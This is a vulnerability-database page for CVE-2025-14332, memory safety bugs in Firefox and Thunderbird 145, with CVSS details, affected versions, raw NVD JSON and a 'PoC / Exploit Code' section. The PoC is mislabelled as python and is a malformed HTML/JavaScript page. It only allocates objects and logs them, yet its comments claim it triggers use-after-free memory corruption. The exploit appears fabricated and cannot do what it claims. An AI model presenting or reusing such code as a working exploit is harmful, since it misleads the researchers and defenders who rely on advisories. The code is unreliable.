Security Vulnerability Report
中文
CVE-2025-14332 CVSS 7.3 HIGH

CVE-2025-14332

Published: 2025-12-09 16:17:41
Last Modified: 2026-04-13 15:16:47
Source: [email protected]

Description

Memory safety bugs present in Firefox 145 and Thunderbird 145. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability was fixed in Firefox 146 and Thunderbird 146.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:thunderbird:*:*:*:*:-:*:*:* - VULNERABLE
Mozilla Firefox < 146
Mozilla Thunderbird < 146

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-14332 PoC - Memory Corruption in Firefox/Thunderbird // This PoC demonstrates the memory safety bug trigger mechanism // Note: This is a simplified proof-of-concept for educational purposes only <!DOCTYPE html> <html> <head> <title>CVE-2025-14332 PoC</title> </head> <body> <h1>Memory Safety Bug Trigger</h1> <p>This PoC attempts to trigger memory corruption in Firefox 145 / Thunderbird 145</p> <script> // Attempt to trigger memory corruption through // JavaScript engine interaction with browser components function triggerMemoryCorruption() { // Create objects that may interact with vulnerable code paths const targetObjects = []; for (let i = 0; i < 10000; i++) { // Allocate various object types const obj = { array: new Array(1000000), string: 'A'.repeat(100000), nested: { deep: { value: i } } }; targetObjects.push(obj); } // Attempt to trigger garbage collection at critical moment // This may expose use-after-free conditions setTimeout(() => { // Force garbage collection if available if (window.gc) { window.gc(); } // Access objects after potential GC for (let i = 0; i < targetObjects.length; i++) { try { // This may trigger use-after-free console.log(targetObjects[i].nested.deep.value); } catch (e) { console.log('Error:', e.message); } } }, 100); // Return objects to trigger deallocation return null; } // Execute the trigger function window.onload = function() { console.log('Starting CVE-2025-14332 trigger...'); triggerMemoryCorruption(); }; </script> </body> </html> // Mitigation: Upgrade to Firefox 146 or Thunderbird 146 // Reference: https://www.mozilla.org/security/advisories/mfsa2025-92/

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14332", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:17:40.887", "lastModified": "2026-04-13T15:16:46.860", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Memory safety bugs present in Firefox 145 and Thunderbird 145. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability was fixed in Firefox 146 and Thunderbird 146."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:*", "versionEndExcluding": "146.0", "matchCriteriaId": "3EF4CBBC-DCB5-4540-8B8A-91DA759ED631"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:-:*:*:*", "versionEndExcluding": "146.0", "matchCriteriaId": "1CB46BC7-512D-45BF-BCF4-73FDDF94DBAF"}]}]}], "references": [{"url": "https://bugzilla.mozilla.org/buglist.cgi?bug_id=1963153%2C1985058%2C1995637%2C1997118", "source": "[email protected]", "tags": ["Broken Link", "Issue Tracking"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-92/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-95/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.